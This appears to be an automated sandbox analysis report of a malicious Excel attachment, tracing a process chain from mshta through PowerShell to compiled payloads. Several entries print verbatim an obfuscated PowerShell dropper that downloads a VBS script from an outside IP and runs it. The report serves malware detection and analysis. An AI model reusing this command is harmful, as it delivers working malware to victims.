Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wow64cpu.dll	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.pdbhP\ source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: aspnet_compiler.exe
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.pdb source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp

Source: F7A30000.0.dr

Initial sample: OLE indicators vbamacros = False

Source: PI#0034250924.xla.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation

.NET source code contains potential unpacker

Source: 12.2.temp_exec.exe.2bc9ae0.2.raw.unpack, c4b3fc756b99a7f509fc28017328f4772.cs	.Net Code: c4dd2d2143b0e5c59902a3c884b46a00e System.Reflection.Assembly.Load(byte[])
Source: 12.2.temp_exec.exe.8e0000.0.raw.unpack, c4b3fc756b99a7f509fc28017328f4772.cs	.Net Code: c4dd2d2143b0e5c59902a3c884b46a00e System.Reflection.Assembly.Load(byte[])

PowerShell case anomaly found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"	Jump to behavior

Suspicious command line found

Source: C:\Windows\System32\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"			Jump to behavior

Compiles C# or VB.Net code

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline"			Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_000007FE899C022D push eax; iretd	7_2_000007FE899C0241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_000007FE899C00BD pushad ; iretd	7_2_000007FE899C00C1
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 12_2_000007FE8B6500BD pushad ; iretd	12_2_000007FE8B6500C1
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 12_2_000007FE8B6500CD pushad ; iretd	12_2_000007FE8B6500C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00407041 push cs; iretd	13_2_00407042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0041705E push edi; iretd	13_2_00417060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004030F0 push eax; ret	13_2_004030F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0041C8FC push cs; iretd	13_2_0041C8C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00401949 push 63DCA26Ah; ret	13_2_0040194E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0040214B push edx; retf	13_2_0040214E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00402101 push ebp; iretd	13_2_0040210D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0040210E push eax; retf	13_2_0040214A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004021A4 push eax; retf	13_2_0040214A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0041125B pushfd ; ret	13_2_0041125E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004242D9 push esp; ret	13_2_00424330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004242E3 push esp; ret	13_2_00424330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00401AB8 push edx; retf	13_2_00401AE3
